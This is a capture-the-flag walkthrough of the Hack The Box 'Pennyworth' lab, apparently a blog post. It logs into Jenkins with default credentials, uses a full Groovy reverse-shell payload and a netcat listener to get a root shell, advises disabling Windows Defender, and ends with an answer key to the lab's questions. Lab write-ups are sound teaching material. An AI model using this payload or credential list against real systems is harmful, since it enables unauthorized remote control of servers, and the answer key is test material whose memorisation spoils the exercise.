#10 Pennyworth - Starting Point - Hack The Box || Complete Walkthrough

Pennyworth is another starting point, In this video, we will be exploring precisely this typology of attack vectors.

 

Enumeration

Click on Spawn Machine and you can see the IP address of the target machine.

As always, we will be starting with the nmap scan. The -sC and -sV switches will be employed in order to force default script usage and advanced version detection for services identified on any of the open ports. This will help us get a better overview of the target and understand its' purpose on the network.

┌──(mrdev㉿mrdev)-[~]
└─$ nmap -sC -sV 10.129.99.178
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-25 10:06 IST
Nmap scan report for 10.129.99.178
Host is up (0.22s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Jetty 9.4.39.v20210325
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
|_http-server-header: Jetty(9.4.39.v20210325)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.01 seconds
┌──(mrdev㉿mrdev)-[~]
└─$

From the output of the scan, we find a singular result of interest. Jetty version 9.4.39 is running on an open TCP port 8080.

Like any other HTTP server, we will need to use our browser to explore this service easily. Navigating the IP address along with the port combination of the target through our URL search bar will yield the following result.

The HTTP server seems to be running a Jenkins service. 


Jenkins Service and Default credential vulnerability

A small summary of this service can be found in the snippet below. It will give us a general idea of the capabilities of such a service and how it might interact with the backend. Any interactions are essential, as they can serve as a gateway to gaining a foothold on the host running everything in the backend. If any of them are misconfigured, they could prove to be an easy path of exploitation for an attacker.

Jenkins is a free and open-source automation server. It helps automate the parts of software development related to building, testing, and deploying, facilitating continuous integration and delivery. It is a server-based system.

The only hint of leverage we currently have against this login screen would be to attempt logging in using default credentials. In the hopes that the server administrators have not yet finished configuring the Jenkins service. Let’s try to log in with the default Jenkins login credential.

admin:password
admin:admin
root:root
root:password
admin:admin1
admin:password1
root:password1

Fortunately, we were right. Attempting multiple combinations, we land on successful login and are presented with the administrative panel for the Jenkins service. Now, it is time to look around.


Foothold

After looking around the website, I found a script console. This script console indicates to us that it only executes the Groovy Script.

Since it only executes the Groovy commands, we will need to create a payload in Groovy to execute the reverse shell connection. Specifically, we will make the remote server connect to us by specifying our IP address and the port that we will listen on for new connections. Through that listening port, the target will end up sending us a connection request, which our host will accept, forming an interactive shell with control over the target's backend system.


Obtaining a Reverse Shell in Jenkins Using Groovy Commands

In order to do that, we will need a specially crafted payload, which we can find in this GitHub cheatsheet . The payload we are looking at looks like this:

String host="{LHOST}";
int port={LPORT};
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Copy this code to Notepad. Now change the IP address to the currently deployed VPN connection. In order to get your IP address for the currently deployed VPN connection, switch the tab to OpenVPN, scroll down, and then you see the IP address.

After finding out your IP address and replacing it in the Script Console.

 ` String host="{your_IP} ";` : Specify the IP address for the target to connect back to.
 ` int port=8000; `           : Specify the port on which the attacker will listen on.
  ` String cmd="/bin/bash"; `  : Specify the shell type the attacker expects. 

* * Since the target is Linux-based, we are using `/bin/bash`. 
    If the target was using Windows, it would have been `cmd.exe`.

Now copy the whole script and paste it to the console:

Before running the command pasted in the Jenkins Script Console, we need to make sure our listener script is up and running on the same port as specified in the command above, for int port=4242. To achieve this, we will use a tool called Netcat.

If you are also a Windows user then you have to download Netcat by searching on Google. There is a problem with every Windows machine. Windows Defender automatically detects Netcat as a virus. So, We have to disable the Windows Defender before running this tool.

Run this tool from the command prompt by typing cmd in the bar. In order to see how to use this tool, we can input the nc -h command into our terminal window.

(c) Microsoft Corporation. All rights reserved.
D:\netcat-1.11> nc -h
[v1.11 NT www.vulnwatch.org/netcat/]
connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound:     nc -l -p port [options] [hostname] [port]
options:
-d              detach from console, background mode
-e prog         inbound program to exec [dangerous!!]
-g gateway      source-routing hop point[s], up to 8
-G num          source-routing pointer: 4, 8, 12, ...
-h              this cruft
-i secs         delay interval for lines sent, ports scanned
-l              listen mode, for inbound connects
-L              listen harder, re-listen on socket close 
-n              numeric-only IP addresses, no DNS
-o file         hex dump of traffic
-p port         local port number
-r              randomize local and remote ports
-s addr         local source address
-t              answer TELNET negotiation
-u              UDP mode
-v              verbose [use twice to be more verbose]
-w secs         timeout for connects and final net reads
-z              zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]
D:\netcat-1.11>

After a short analysis of the help output, we can open a new terminal tab and type in the following command to start a Netcat listener on the specified port. This will make our attacker host ready to receive connections from the target, the last remaining step before launching the script we placed in the Jenkins Script Console.

D:\netcat-1.11> nc -lvnp 4242
listening on [any] 4242 ...

Now that our listener is turned on, we can execute the payload by clicking the Run button.

Once the script is run, we can navigate to the Command Prompt, where Netcat is running, and check on the connection state. From the output, we understand that a connection has been received from an unknown source, and then blank space. We can try to interact with the shell by typing in the whoami and id commands.

These commands help verify our permission level on the target system. From the output, we can quickly determine that we rest at the highest level of privilege.

D:\netcat-1.11> nc -lvnp 4242
listening on [any] 4242 ...
connect to [10.10.14.101] from (UNKNOWN) [10.129.99.178] 58352
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)

We have command execution. Navigate to the /root directory on the target and read the flag.

cd /root
ls
flag.txt
snap
cat flag.txt
9********************************5

As you can see the flag on my screen. Copy this flag and paste it to Hack the Box.


Task Answers


TASK 1: What does the acronym CVE stand for?

Ans. Common Vulnerabilities and Exposures

TASK 2: What do the three letters in CIA, referring to the CIA triad in cybersecurity, stand for?

Ans. confidentiality, integrity, availability

TASK 3: What is the version of the service running on port 8080?

Ans. Jetty 9.4.39.v20210325

TASK 4: What version of Jenkins is running on the target?

Ans. 2.289.1

TASK 5: What type of script is accepted as input on the Jenkins Script Console?

Ans. Groovy

TASK 6: What would the "String cmd" variable from the Groovy Script snippet be equal to if the Target VM was running Windows?

Ans. cmd.exe

TASK 7: What is a different command than "ip a" we could use to display our network interfaces' information on Linux?

Ans. ifconfig

TASK 8: What switch should we use with Netcat for it to use UDP transport mode?

Ans. -u

TASK 9: What is the term used to describe making a target host initiate a connection back to the attacker host?

Ans. reverse shell


Tags

You may like these posts

Show more

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.

If you have any doubts or any queries you can specify here.

#buttons=(Ok, Go it!) #days=(20)

Our website uses cookies to enhance your experience. Learn More
Ok, Go it!